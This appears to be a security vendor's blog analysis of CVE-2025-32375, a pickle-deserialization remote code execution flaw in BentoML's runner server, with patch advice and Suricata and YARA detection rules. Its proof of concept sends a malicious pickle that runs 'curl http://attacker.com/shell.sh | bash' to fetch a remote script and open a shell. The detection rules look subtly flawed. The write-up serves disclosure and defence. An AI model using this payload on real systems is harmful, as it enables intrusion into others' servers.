Logic scanner now available! Try it out
CVE Analysis - 7 min read

Critical RCE in BentoML Runner Server: Deep Dive into CVE-2025-32375

An in-depth technical analysis of CVE-2025-32375, a critical remote code execution vulnerability in BentoML's runner server, including exploitation methods, detection techniques, and patching guidance.

Critical RCE in BentoML Runner Server: Deep Dive into CVE-2025-32375

Critical RCE in BentoML Runner Server: Deep Dive into CVE-2025-32375

Introduction

Machine learning deployments face a critical threat as BentoML's runner server vulnerability (CVE-2025-32375) exposes systems to remote code execution. Attackers can exploit insecure deserialization practices to execute arbitrary commands, potentially compromising sensitive data and critical infrastructure. With a CVSS score of 9.8, immediate action is necessary.

Affected Systems and Versions

BentoML versions 1.0.0a1 through 1.4.7 are vulnerable. The issue specifically affects the runner server component, which processes serialized data without adequate validation.

Technical Information

The vulnerability originates from the _deserialize_single_param function in runner_app.py, which deserializes untrusted HTTP request data using Python's pickle module:

async def _request_handler(request: Request) -> Response:
    arg_num = int(request.headers["args-number"])
    r_: bytes = await request.body()
    if arg_num == 1:
        params: Params[t.Any] = _deserialize_single_param(request, r_)

Attackers exploit this by setting headers such as Payload-Container and Payload-Meta and including a malicious pickle payload in the request body. The payload executes arbitrary OS commands via Python's __reduce__ method during deserialization.

Proof of Concept

A working exploit demonstrating the vulnerability:

import requests
import pickle

headers = {
    "args-number": "1",
    "Payload-Container": "NdarrayContainer",
    "Payload-Meta": '{"format": "default"}',
}

class Exploit:
    def __reduce__(self):
        return (__import__('os').system, ('curl http://attacker.com/shell.sh | bash',))

response = requests.post("http://target:8888", headers=headers, data=pickle.dumps(Exploit()))

This payload fetches and executes a remote script, establishing a reverse shell.

Patch Information

The vulnerability is fixed in BentoML version 1.4.8. Organizations should immediately upgrade:

pip install --upgrade bentoml==1.4.8

The patch replaces pickle serialization with JSON, eliminating the insecure deserialization vector.

Detection Methods

Suricata rule for detecting exploitation attempts:

alert http $HOME_NET any -> $EXTERNAL_NET 8888 (
    msg:"BentoML RCE Exploit Attempt";
    flow:to_server;
    http.method; content:"POST";
    http.header; content:"Payload-Container"; content:"NdarrayContainer";
    http.header; content:"Payload-Meta"; content:"{\"format\":\"default\"}";
    threshold:type limit, track by_src, count 1, seconds 60;
    reference:cve,2025-32375;
)

YARA rule for malicious pickle payloads:

rule bentoml_rce_pickle {
    meta:
        description = "Detects pickle payloads for BentoML RCE"
    strings:
        $reduce = "__reduce__"
        $os_system = "os.system" nocase
        $subprocess = "subprocess.Popen" nocase
    condition:
        all of them and filesize < 512KB
}

Vendor Security History

BentoML previously addressed similar critical vulnerabilities, notably CVE-2025-27520, also involving insecure deserialization. Although patches were promptly issued, repeated similar vulnerabilities indicate potential gaps in security auditing.

References

Immediate action and thorough remediation are essential to protect against exploitation of this critical vulnerability.

Ready for effortless AppSec?

Get a live ZeroPath tour.

Schedule a demo with one of the founders Dean Valentine Raphael Karger Nathan Hrncirik Yaacov Tarko to get started.